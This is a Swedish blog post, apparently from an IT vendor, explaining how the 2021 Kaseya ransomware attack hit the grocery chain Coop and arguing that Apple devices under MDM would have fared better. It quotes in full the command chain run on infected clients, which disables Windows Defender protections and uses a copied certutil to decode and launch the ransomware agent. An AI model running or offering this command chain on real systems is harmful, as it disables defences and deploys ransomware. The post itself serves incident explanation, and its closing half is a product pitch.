2021-07-08

Kaseya attacken som drabbade matvaruaffären Coop - vad hände och vad kan vi lära oss från den?

Till att börja med så vill jag passa på att ge Coop en stor eloge för hur de hanterade situationen. Kan tänka mig att det inte är lätt att mötas av oändliga support samtal på en fredagkväll och ganska snabbt kunna konstatera det faktum att något stort är på gång. Jag har själv jobbat inom detaljhandeln och driftat den här typen av system så kan lätt relatera till hur detta har eskalerats. Vet också hur mycket och stort beslut det innebär att stänga samtliga butiker.

Jesper Andersson Erbjudandeansvarig

Men om vi ska titta på vad det var som egentligen drabbade Coop. Likt många andra företag så har de ett stort behov av att kunna fjärrkontrollera sina dator klienter. Det kan vara allt ifrån att säkerställa att rätt inställningar är applicerade till att man hjälper någon som har kört fast i systemet.

För detta ändamål har leverantören Visma, som sköter driften av kassasystemet på Coop, använt en programvara ifrån en leverantör som heter Kaseya. I korta drag så har man en central server som sköter klienterna på företags nätverket. Många som hanterar Windows-klienter använder exempelvis Configuration Manager ifrån Microsoft för detta ändamål.

Den centrala servern var kopplad till internet för att kunna hämta uppdateringar och patchar för att sedan kunna applicera dom på klienter inom ens egna nätverk. Det var här man utnyttjade en sårbarhet så att Kaseya centrala server hämtade ner ett Ransomware virus som hade ändamålet att låsa hårdiskarna samt operativet på de klienter som hanterades av den centrala servern.

Här är exakt vad som kördes på klienterna:

execFile(): Path="C:\windows\system32\cmd.exe", arg="/c ping 127.0.0.1 -n 7615 > nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\kworking1\agent.crt c:\kworking1\agent.exe & del /q /f c:\kworking1\agent.crt C:\Windows\cert.exe & c:\kworking1\agent.exe", flag=0x00000002, timeout=0 seconds

Kortfattat så stängde koden av Windows Defender som är det inbyggda antivirusskyddet använde certutil för att koda den agent.crt filen samt agent.exe filen. För att sedan köra det.

Konsekvensen blev att hårdiskarna blev låsta / krypterade och obrukbara om man inte hade nyckeln.

Hur löste man detta då?

Jo genom att säkerställa att man stängde av den centrala Kaseya-servern så såg man till att nya klienter inte kunde bli smittade. Troligen gjorde man nätverksanalyser samt låste ner så att klienterna inte kan använda internet utan bara nå de resurser som verkligen var nödvändiga.

Efter att man har lyckats säkerställa att nya klienter inte låses eller smittas av viruset igen, var den lättaste och snabbaste utvägen att installera om datorerna som hade blivit smittade. Detta gjorde man genom att skicka ut it-tekniker vars uppgift var att återställa smittade datorer.

Bra jobbat och troligen den bästa lösningen och snabbaste lösningen under rådande omständigheter. 👏

Om man leker med tanken att Coop hade haft ett annat operativsystem än Windows... hade de drabbats på samma sätt då? Troligen inte. Nu menar jag inte att Windows är dåligt på något sätt, och man kan så klart minska risken där.

Om man t.ex. tar en standard installerad MAC OS dator, där har bara Apple rättigheter till System Partitionen. Så ingen annan kan skriva till den. Inte ens som du har superadministratörs rättigheter ”Root” (JA det går, men då måste man starta om datorn, och stänga av System Integretity Protection) Vilket kräver fysisk tillgång till datorn samt att du har administratörs lösenordet.

Men visst om det hade legat som en tjänst som hade lite högre behörigheter så hade viruset kunnat kryptera vissa personliga filer och applikationer. Vilket kan vara illa det med.

Men eftersom att systemet inte hade blivit påverkat så hade datorn fungerat som den ska, man hade också kunnat installera om datorn om den hade varit managerad av en Mobile Device Management (MDM) Lösning. Även formatera och partitionerna volymer på distans.

Nu var ju detta virus signerat av en godkänd utfärdare viket gjorde att Windows litade på att köra koden. Det hade en Apple Dator också gjort. En stor skillnad är dock att om Apple får reda på att signaturen används för detta ändamål så kommer de att blockera den utformningen och se till att klienterna inte kör koden. Utan att man själv behöver justera eller göra något. Beroende på hur snabbt Apple hade blockerat signaturen så hade det minskat utfallet.

Nu är MAC OS ganska öppet ändå om man jämför med exempelvis en iOS enhet, där bara kod som är granskad och signerad av Apple tillåts att köras. Samtliga ovanstående saker hade man också kunnat göra med fjärrominstallation osv.

Jag tycker att det är riktigt skoj att se att flera butiker inom detaljhandeln har börjat använda alternativa enheter för att hantera sin försäljning. Finns riktigt många bra saker man kan göra med Apple på företaget nu, Apple har gjort stora justeringar för att fungera bättre i en enterprise miljö.

Hoppas att någon vågar prova detta. Kontakta mig om du vill veta mer.